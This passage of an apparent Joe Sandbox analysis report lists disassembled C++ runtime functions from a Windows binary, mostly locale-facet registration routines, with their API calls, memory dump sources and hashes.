                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEDE8
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AEEE5D
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AEEE87
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                                                                        • String ID:
                                                                        • API String ID: 459529453-0
                                                                        • Opcode ID: 38b6504841422cbd93260903668e0ff9964466e438fd78b193547ca68a8e4c2f
                                                                        • Instruction ID: bac5a1fcd466a734c7cf11c94f0c8b4e1bb365ea3890f2689357a40d26c18402
                                                                        • Opcode Fuzzy Hash: 38b6504841422cbd93260903668e0ff9964466e438fd78b193547ca68a8e4c2f
                                                                        • Instruction Fuzzy Hash: D741FF31D00699EFCB10CFA8D980BAEBBB4FB06724F144659E915A7391DB30AE44CBD1
                                                                        APIs
                                                                        • GetLastError.KERNEL32(00000010,00000010,?,00AE7912,?,?), ref: 00AE7C37
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLast
                                                                        • String ID: Call to ShellExecuteEx() returned:$Last error=$false$true
                                                                        • API String ID: 1452528299-1782174991
                                                                        • Opcode ID: 8bee4e7c0a214ff6915812cdb5991020dee299ef6174fd828fca0aea395bda39
                                                                        • Instruction ID: 175109dcff24003dcc5a5e75af30fbef83a5da3df20b599005c56373e5dcfaed
                                                                        • Opcode Fuzzy Hash: 8bee4e7c0a214ff6915812cdb5991020dee299ef6174fd828fca0aea395bda39
                                                                        • Instruction Fuzzy Hash: B9215E49A102A286CB741F3E8400739B2F4EF94745F7518AFD9C9D7394E76A8CC28394
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: Maklocstr$Maklocchr
                                                                        • String ID:
                                                                        • API String ID: 2020259771-0
                                                                        • Opcode ID: f3101adc4fe773e585839ab5e53e1b0273af8bd546af4e0af7761eccca7dbcc4
                                                                        • Instruction ID: 67789a9d30bfc9998c97ff1727d4e9735396fb48fc781f0efe00277aa697ca4a
                                                                        • Opcode Fuzzy Hash: f3101adc4fe773e585839ab5e53e1b0273af8bd546af4e0af7761eccca7dbcc4
                                                                        • Instruction Fuzzy Hash: B1118CB1508748BBE720DBE59881F6AB7ECBF08310F04051AF2898BA41D6A5FD5087A4
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF282A
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2834
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • numpunct.LIBCPMT ref: 00AF286E
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF2885
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF28A5
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: e948096cc8a9e2ed37502633f8dd52c4c59ee4cbcd3c8ddab07811ca1a8c4f17
                                                                        • Instruction ID: b2dcd6c3e1fc996fdb117e3b8f911558630948371bdd650f0ed66bec9996d75f
                                                                        • Opcode Fuzzy Hash: e948096cc8a9e2ed37502633f8dd52c4c59ee4cbcd3c8ddab07811ca1a8c4f17
                                                                        • Instruction Fuzzy Hash: FA11ED3690065D9BCF04EBA4C956BBE7BB1AF84710F280049F611AB391DF349E018BD1
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF8037
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF8041
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • numpunct.LIBCPMT ref: 00AF807B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF8092
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF80B2
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registernumpunct
                                                                        • String ID:
                                                                        • API String ID: 743221004-0
                                                                        • Opcode ID: 994a1f3578822ce68ed35c7e17432352b2810f330e01af63dbc3c6a85d050cc3
                                                                        • Instruction ID: 8c2c6f5c9c4654e56786c6bc08de3bf8533afb52e292d85eaef028e49b91341f
                                                                        • Opcode Fuzzy Hash: 994a1f3578822ce68ed35c7e17432352b2810f330e01af63dbc3c6a85d050cc3
                                                                        • Instruction Fuzzy Hash: 3501803690061D9BCB15EBE4D9456BE7BA1AF84310F640549F610AB2D2DF349E068B91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF75BD
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF75C7
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • codecvt.LIBCPMT ref: 00AF7601
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7618
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7638
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: 820f8c6ed337387960b1d62bc71fa8ee524a887ce31715f817830a4fdb0e7f82
                                                                        • Instruction ID: b5ff94f2c96080846dd6b0739b5fa4763844863dbb1c08fa38610a8cc7c9854c
                                                                        • Opcode Fuzzy Hash: 820f8c6ed337387960b1d62bc71fa8ee524a887ce31715f817830a4fdb0e7f82
                                                                        • Instruction Fuzzy Hash: E801807590465D9BCB05EBB8D945ABE7BB1AF84310F240449F611AB392DF349F02CB91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF76E7
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF76F1
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • collate.LIBCPMT ref: 00AF772B
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7742
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7762
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 28431dbb9752fd5c7dbd73545db4734fb656cb293025055df8bba17a65bb8890
                                                                        • Instruction ID: c847296e3d475b2fb1f248fffa93fb67d614bad21cf9737faa2bbff220978656
                                                                        • Opcode Fuzzy Hash: 28431dbb9752fd5c7dbd73545db4734fb656cb293025055df8bba17a65bb8890
                                                                        • Instruction Fuzzy Hash: F601C03591465D9BCB01FBA4DA45ABE7BA1AF84310F240449F6116B2D2DF349E029B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF266B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF2675
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • codecvt.LIBCPMT ref: 00AF26AF
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF26C6
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF26E6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: c826efad15bb3e14fb2b31caa2bcab0cb3d47dabfdfcbf0cac071b17c8159045
                                                                        • Instruction ID: 4209c6dfb6bf1325390ce5ce1d83b82df5610643e20cee340be184c5250f88c3
                                                                        • Opcode Fuzzy Hash: c826efad15bb3e14fb2b31caa2bcab0cb3d47dabfdfcbf0cac071b17c8159045
                                                                        • Instruction Fuzzy Hash: A001C035900A5D9BCF05EBA4C9457BEBBA1EF84310F240409F610AB291DF749E029B90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7652
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF765C
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • codecvt.LIBCPMT ref: 00AF7696
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF76AD
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF76CD
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                                                                        • String ID:
                                                                        • API String ID: 712880209-0
                                                                        • Opcode ID: d07e4f1f916c8d76c52a4010261e2623a606043d2f3669a567804d94e889d13e
                                                                        • Instruction ID: 3e1c7e5e7ac9dc80c3578919df4a69d3d59226121713a7949ca6247cd1f1cc00
                                                                        • Opcode Fuzzy Hash: d07e4f1f916c8d76c52a4010261e2623a606043d2f3669a567804d94e889d13e
                                                                        • Instruction Fuzzy Hash: 0301C036914A1D8BCB01EBA8D945ABE7BB1BF88311F240009F610AB391DF349E028B91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF777C
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7786
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • collate.LIBCPMT ref: 00AF77C0
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF77D7
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF77F7
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 3b62e954015c29b08beb732cd325cc529ce3527e42a8181ca82d220413b61a01
                                                                        • Instruction ID: d3be2987ba9227ee4408247d7af184141b0abec2f5bacc942f0b384c62792ec5
                                                                        • Opcode Fuzzy Hash: 3b62e954015c29b08beb732cd325cc529ce3527e42a8181ca82d220413b61a01
                                                                        • Instruction Fuzzy Hash: 9F01C07590461DDBCB01FBA4D9456BE7BB1AF84310F240449F6216B2D2CF349E028BD0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF78A6
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF78B0
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • messages.LIBCPMT ref: 00AF78EA
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7901
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF7921
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: eb2a51f5a472fb44e2accd6f4190b0245447bb77252cf262a663fb029481011b
                                                                        • Instruction ID: 17232abd3352811f877c31db66ee293e8512fad908f158a1b3c1b6353de19e10
                                                                        • Opcode Fuzzy Hash: eb2a51f5a472fb44e2accd6f4190b0245447bb77252cf262a663fb029481011b
                                                                        • Instruction Fuzzy Hash: FB01803590461D9BCB15EBE4DA466BE7BA1AF84310F240449F6106B292DF749F01DB90
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B038C8
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B038D2
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • collate.LIBCPMT ref: 00B0390C
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03923
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03943
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercollate
                                                                        • String ID:
                                                                        • API String ID: 1007100420-0
                                                                        • Opcode ID: 4aeaa0bc03c3e5e1a8d45f9d3c57bb8a055cf5e3a925f6d452a4d43180342fc1
                                                                        • Instruction ID: 8647cf0f7360ce22668ab6ae9f04e073d3432cafbd4946d0acb4a7f13290d2dd
                                                                        • Opcode Fuzzy Hash: 4aeaa0bc03c3e5e1a8d45f9d3c57bb8a055cf5e3a925f6d452a4d43180342fc1
                                                                        • Instruction Fuzzy Hash: 910192359006199BCF05EBA4C94AABEBBE9EF84720F240489F6116B3D1DF749F018B94
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF7811
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF781B
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • ctype.LIBCPMT ref: 00AF7855
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF786C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF788C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registerctype
                                                                        • String ID:
                                                                        • API String ID: 83828444-0
                                                                        • Opcode ID: 0e91b4baf3861f88b51ab936f2e68b341463b9a47760ded0246be7e286e5c139
                                                                        • Instruction ID: ade80334a10b11604f7452b1310a133fae6eb71282f802c1e0f0bd0caa236e8f
                                                                        • Opcode Fuzzy Hash: 0e91b4baf3861f88b51ab936f2e68b341463b9a47760ded0246be7e286e5c139
                                                                        • Instruction Fuzzy Hash: 7701CC7690465E8BCB05EBA4D94A6BE7BB1AF84310F240409F611AB2D2DF349E02CBD0
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00AF793B
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00AF7945
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • messages.LIBCPMT ref: 00AF797F
                                                                        • std::_Facet_Register.LIBCPMT ref: 00AF7996
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00AF79B6
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: 947293becc10e071cd4deeb6471eddb161178d5f56731e77f379425ec56a74b1
                                                                        • Instruction ID: 0acb2f07c98cea7a60e7c4c6bc908d6ca218687ec5b541b47690f27b8ebdbe29
                                                                        • Opcode Fuzzy Hash: 947293becc10e071cd4deeb6471eddb161178d5f56731e77f379425ec56a74b1
                                                                        • Instruction Fuzzy Hash: 6701927590461D9BCB05EBA8DA46ABE7BB1AF85310F240449F6106B3D2DF749F028BA1
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B0395D
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03967
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • messages.LIBCPMT ref: 00B039A1
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B039B8
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B039D8
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermessages
                                                                        • String ID:
                                                                        • API String ID: 2750803064-0
                                                                        • Opcode ID: 67d5211c509d0f4e548f1d0c4a03b66f1293de350a51d8af65be34d85cd705fc
                                                                        • Instruction ID: fed44c35a54de6b7c3bae6fd2f4f584c527dd188336fe6e613dc10ef5823330e
                                                                        • Opcode Fuzzy Hash: 67d5211c509d0f4e548f1d0c4a03b66f1293de350a51d8af65be34d85cd705fc
                                                                        • Instruction Fuzzy Hash: 9101D2359006199BCF01EBA8C94A6BE7BF9EF85720F250449F5116B2D1DF749F02CB91
                                                                        APIs
                                                                        • __EH_prolog3.LIBCMT ref: 00B03BB1
                                                                        • std::_Lockit::_Lockit.LIBCPMT ref: 00B03BBB
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 00AEBD10
                                                                          • Part of subcall function 00AEBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 00AEBD38
                                                                        • moneypunct.LIBCPMT ref: 00B03BF5
                                                                        • std::_Facet_Register.LIBCPMT ref: 00B03C0C
                                                                        • std::_Lockit::~_Lockit.LIBCPMT ref: 00B03C2C
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.1734746472.0000000000AE1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00AE0000, based on PE: true
                                                                        • Associated: 00000004.00000002.1734709842.0000000000AE0000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734810626.0000000000B2D000.00000002.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734846819.0000000000B43000.00000004.00000001.01000000.00000004.sdmp
                                                                        • Associated: 00000004.00000002.1734887884.0000000000B47000.00000002.00000001.01000000.00000004.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_ae0000_MSI5DEF.jbxd
                                                                        Similarity
                                                                        • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registermoneypunct
                                                                        • String ID:
                                                                        • API String ID: 419941038-0
                                                                        • Opcode ID: 07e9cb2c598c4284f7d3c2302d5039a630c0831b7cb094360a45951bfd1bb857
                                                                        • Instruction ID: 8c29fef18888afc0bd408a2ff8eac6551fcc7ce72513e3bd8add89f01c2fbcc2
                                                                        • Opcode Fuzzy Hash: 07e9cb2c598c4284f7d3c2302d5039a630c0831b7cb094360a45951bfd1bb857
                                                                        • Instruction Fuzzy Hash: 9B01D27590061ADBCB11EBA4CA4A6BE7BF5EF84710F240449F610AB2D2DF749F028B90
